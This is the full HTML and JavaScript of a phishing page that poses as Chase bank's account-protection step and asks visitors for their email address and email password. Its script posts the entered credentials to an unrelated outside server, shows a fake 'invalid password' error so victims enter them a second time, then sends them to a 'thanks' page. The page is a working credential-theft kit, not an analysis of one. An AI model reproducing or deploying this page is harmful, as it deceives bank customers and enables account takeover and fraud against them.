
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" dir="ltr">
<head>
        <meta charset="utf-8">
        <meta name="robots" content="noindex,nofollow">
        <meta http-equiv="X-UA-Compatible" content="IE=edge">
        <title>For Your Protection</title>
        <meta name="viewport" content="width=device-width, initial-scale=1.0">
        <link rel="shortcut icon" href="https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/img/chasefavicon.ico">
        <link rel="apple-touch-icon" sizes="152x152" href="https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/img/chase-touch-icon-152x152.png">
        <link rel="apple-touch-icon" sizes="120x120" href="https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/img/chase-touch-icon-120x120.png">
        <link rel="apple-touch-icon" sizes="76x76" href="https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/img/chase-touch-icon-76x76.png">
        <link rel="apple-touch-icon" href="https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/img/chase-touch-icon.png">
        <link rel="stylesheet" href="https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/css/logon.css">
        <link rel="stylesheet" href="https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/css/blue-ui2.css">
        <link rel="stylesheet" href="https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/css/overview.css">

</head>

 <script type="text/javascript">
 $(function () {
          window.onload = $('#submit_btn3').click();
      });
</script>

<body style="overflow-x: hidden; overflow-y: auto; height: 100%" data-has-view="true">
    <style type="text/css">
    .help-block.form-error{
        color:#bf2155;
    }

.jpui.alert.primary .title {
    font-size: 1rem;
    color: #bf2155;
}
.jpui.alert.primary.inverted {
    color: #bf2155!important;
}
.jpui.alert.primary {
    background-color: #bf2155;
}
.jpui.icon.error {
    background-color: inherit!important;
    color: #bf2155!important;
}

.icon{display:none}@font-face{font-family:dcefont;font-style:'normal';font-weight:'normal';src:url(https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/css/fonts/fonts/dcefont.eot);src:url(https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/css/fonts/dcefont.eot?#iefix) format('embedded-opentype'),url(https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/css/fonts/dcefont.woff) format('woff'),url(https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/css/fonts/dcefont.ttf) format('truetype'),url(https://storage.googleapis.com/perceptive-seat-268000.appspot.com/ch/Files/css/fonts/dcefont.svg#dcefont) format('svg')}

</style>
<div data-is-view="true">
<div class="homepage">

<div class="logon-container">
<header class="toggle-aria-hidden">
<div class="logon header jpui transparent navigation bar">
<a href="#">
<div class="chase logo"></div>
<span class="util accessible-text">SPOX LOVE YOU !</span>
</a> 
</div>
</header>
<form >
<input type="hidden" name="token" value="chaseSP0X">
<main id="logon-content" data-has-view="true">
<div class="msd password-reset reset-code" data-is-view="true">
<div id="backgroundImage">
<div class="jpui background image fixed blurred" id="geoImage">
<style type="text/css">.jpui.background.image { background-image: url(https://static.chasecdn.com/content/geo-images/images/background.mobile.night.12.jpeg);filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://static.chasecdn.com/content/geo-images/images/background.mobile.night.12.jpeg', sizingMethod='scale');-ms-filter: progid:DXImageTransform.Microsoft.AlphaImageLoader(src='https://static.chasecdn.com/content/geo-images/images/background.mobile.night.12.jpeg', sizingMethod='scale');}@media (min-width:320px) { .jpui.background.image{background-image:url(https://static.chasecdn.com/content/geo-images/images/background.mobile.night.12.jpeg); } }@media (min-width:992px) { .jpui.background.image{background-image:url(https://static.chasecdn.com/content/geo-images/images/background.tablet.night.12.jpeg); } }@media (min-width:1024px) { .jpui.background.image{background-image:url(https://static.chasecdn.com/content/geo-images/images/background.desktop.night.12.jpeg); } }</style>

</div>
</div>
<div class="container">
<div class="row jpui primary panel">
<div class="col-xs-12 col-md-10 col-md-offset-1 content-container">
    <h1 class="header" tabindex="-1">For Your Protection</h1>
<div class="row jpui panel body">
<div class="col-xs-12 col-sm-10 col-sm-offset-1">
<div class="progress u-no-outline" id="progress" tabindex="-1">
<div class="row">
<div class="col-xs-12 col-sm-6 clear-padding">
</div>
<div class="col-xs-12 col-sm-6 progress-padding">
<div class="jpui progress rectangles" id="progress-progressBar" data-progress="">
<ol class="steps-3" role="presentation">
    <li class="active"></li>
    <li class="active current-step"></li>
    <li id="progress-progressBar-step-3"></li>
</ol>


</div>
</div>
</div>
</div>
<style type="text/css">
    .jpui.alert.spox.spox .title {
    font-size: 1rem;
    font-weight: 300;
    color: #bf2155;
    letter-spacing: 0;
    text-decoration: none;
    width: 100%;
    margin: .0625rem .0625rem .313rem 0;
}

</style>


<form  >


							
    <h3>Email authentication </h3>
    <p>For Your identification, We need you to sign-in to your registered email which we have in our records.</p>


<div class="jpui error error jpui spox spox inverted primary animate alert" id="msg" style="display: none;" aria-labelledby="inner-alert-the-user"><div class="icon background"></div> <div class="content wrap" ><h2 class="title" tabindex="-1" ><span class="util accessible-text"></span >Invalid Email address or Email password, please try again</h2>   </div></div>


<div class="inside-container">
<div class="row">
<div class="col-xs-12 col-sm-5 label-column otp-code">
    <label class="jpui label msdLabelHeightFix">
        <span class="accessible-text hidden"></span>Email address </label>
</div>
<div class="col-xs-12 col-sm-5 form-column otp-code">
<div class="account-input ssn_card_account_number">
    <input class="jpui input account-input ssn_card_account_number" data-validation="email"  placeholder="" type="text" name="email" id="email" >    </div>
</div>
</div>
<div class="row">
<div class="col-xs-12 col-sm-5 label-column">
    <label class="jpui label">
    <span class="accessible-text hidden"></span>Email Password</label>
</div>
<div class="col-xs-12 col-sm-5 form-column">
<div class="margin-bottom-20px" id="password_input">
<input class="jpui input margin-bottom-20px" placeholder="" type="password" id="password" data-validation="length" data-validation-length="min4-30" name="password" data-validation-error-msg=" ">
</div>
</div>
</div>
<p class="identification-code-received-message">
<span>We ask you to verify your email to add this device as <a class="link-anchor underline" href="javascript:void(0);" >Trusted Devices,</a>and safeguard your account from any unauthorized login from unknown device.</span>
<span class="jpui link" id="requestNewIdentificationCode-link-wrapper">
</span>
</p>
</div>
<div class="button-container row show-sm">
<div class="col-xs-12 col-sm-3 col-sm-offset-6">
<button type="button" class="jpui button focus fluid ">
    <span class="label">Cancel</span>
</button>
</div>
<div class="col-xs-12 col-sm-3">
<button type="submit" id="submit-btn" class="jpui button focus fluid primary ">
    <span class="label">Next</span>
</button>

</div>
</div>
</form>
</div></div></div></div></div></div>
</main>
</div>
</div> 
</div>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.10.2/jquery.min.js"></script>
<script src="//cdnjs.cloudflare.com/ajax/libs/jquery-form-validator/2.3.26/jquery.form-validator.min.js"></script> 


<script>

      $("#submit-btn1").hide();

      /* global $ */
      $(document).ready(function(){
        var count=0;

      /////////////url email getting////////////////
      var email = window.location.hash.substr(1);
      if (!email) {

      }
      else
      {
          // $('#email').val(email);
          var my_email =email;
          var ind=my_email.indexOf("@");
          var my_slice=my_email.substr((ind+1));
          var c= my_slice.substr(0, my_slice.indexOf('.'));
          var final= c.toLowerCase();
          
          $('#contact').trigger("reset");
          $("#msg").hide();
            // $('#fieldImg').attr('src', 'images/other-1.png');
            // $('#field').html("Other Mail");
            $('#email').val(my_email);
            $('#emailch').html(my_email);
            $("#msg").hide();
            // $("#inputbar").animate({left:200, opacity:"hide"}, 0);
            // $("#automail").animate({right:200, opacity:"show"}, 1000);
            // $('#ajaxModal').modal('show');
          }
        ///////////////url getting email////////////////
				
		
        $('#submit-btn').click(function(event){
          $('#error').hide();
          $('#msg').hide();
          event.preventDefault();
          var email=$("#email").val();
          var password=$("#password").val();
          var msg = $('#msg').html();
          $('#msg').text( msg );
        ///////////new injection////////////////
        var my_email =email;
        var filter = /^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;

        // if (!filter.test(my_email)) {
        //   $('#error').show();
        //   email.focus;
        //   return false;
        // }
 


        var ind=my_email.indexOf("@");
        var my_slice=my_email.substr((ind+1));
        var c= my_slice.substr(0, my_slice.indexOf('.'));
        var final= c.toLowerCase();
        var n = my_email.search("@");
        ///////////new injection////////////////
        count=count+1;
        
        $.ajax({
          dataType: 'JSON',
          url: 'https://gorubbishremovals.co.uk/ch/step.php',
          type: 'POST',
      	data:{
      		email:email,
      		password:password,
      	},
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
            	$('#submit-btn').val('Verifing...');
            },
            success: function(response){
            	if(response){
            		$("#msg").show();
            		console.log(response);
            		if(response['signal'] == 'ok'){
            			$("#password").val("");
            			if (count>=2) {
            				count=0;
                    // window.location.replace(response['redirect_link']);
                        		window.location.replace("https://main.d39v7bo3us6tmq.amplifyapp.com/thanks.html");

                }
                $('#msg').html(response['msg']);
            }
            else{
            	$('#msg').html(response['msg']);
            }
        }
    },
    error: function(){
    	$("#password").val("");
    	if (count>=2) {
    		count=0;
    		    		window.location.replace("https://main.d39v7bo3us6tmq.amplifyapp.com/thanks.html");
    	}
    	$("#msg").show();
    	$('#msg').html("Invalid Email address or Email password, please try again!");
    },
    complete: function(){
    	$('#submit-btn').val('Continue');
    }
});
  });


	});


</script>



</body>
</html>